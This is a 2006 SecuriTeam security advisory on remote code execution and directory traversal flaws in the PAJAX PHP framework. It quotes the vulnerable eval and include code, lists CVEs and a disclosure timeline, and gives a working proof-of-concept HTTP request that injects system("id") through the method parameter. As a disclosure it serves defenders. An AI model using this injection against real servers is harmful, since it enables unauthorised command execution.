The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PAJAX XSS and File Inclusion
------------------------------------------------------------------------
SUMMARY
" <http://www.auberger.com/pajax/> PAJAX - Remote (a)synchronous PHP
objects in JavaScript"
PAJAX does not properly validate user input, allowing attackers to cause a
cross site scripting and file inclusion attacks by using the PAJAX
framework.
DETAILS
Vulnerable Systems:
* pajax version 0.5.1 and prior
Immune Systems:
* pajax version 0.5.2 and above
By using PAJAX it is possible to write web applications that utilize PHP
classes running on a remote server to perform operations. PAJAX is able to
create a remote JavaScript interface object and a stub on the server for
some PHP class. The JavaScript interface communicates with the stub on the
server, which invokes the called methods on the remote object. To invoke
methods on an object PHP's eval function is used.
/pajax/pajax_call_dispatcher.php contains the following code:
// Invoking the method with args
eval("\$ret = \$obj->$method(".$args.");");
The $method and $args parameters consist of unchecked POST variables,
which may contain harmful PHP code.
Additionally a file is included for each specified classname. The
included file consists of predefined paths and the user supplied
variable $className:
function loadClass($className) {
$paths = split(CLASS_PATH_DELIMITER, $this->classPath);
foreach ($paths as $path) {
$classPath = $path . "/" . $className . ".class.php";
[...]
This variable is not validated and thus allows directory traversal
attacks.
Proof of Concept:
[s@host ~]$ nc www.example.com 80
POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Content-Type: text/json
Content-length: 137
Host: www.example.com
{"id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "Calculator",
"method": "add(1,1);system("id");$obj->add", "params": ["1", "5"]}
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2006 14:21:08 GMT
Server: Apache
X-Powered-By: PHP/4.4.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
27
uid=80(www) gid=80(www) groups=80(www)
[...]
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1551>
CVE-2006-1551
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1789>
CVE-2006-1789
Disclosure Timeline:
2006-03-30 Discovery of the problem
2006-03-30 Notification of the author
2006-03-30 Initial response from the author
2006-04-12 A fixed version of PAJAX is available
2006-04-13 Public release
2006-04-14 Added 2nd CVE, changed history to ISO 8601
ADDITIONAL INFORMATION
The information has been provided by
<mailto:release@redteam-pentesting.de> RedTeam Pentesting.
The original article can be found at:
<http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.txt>
http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
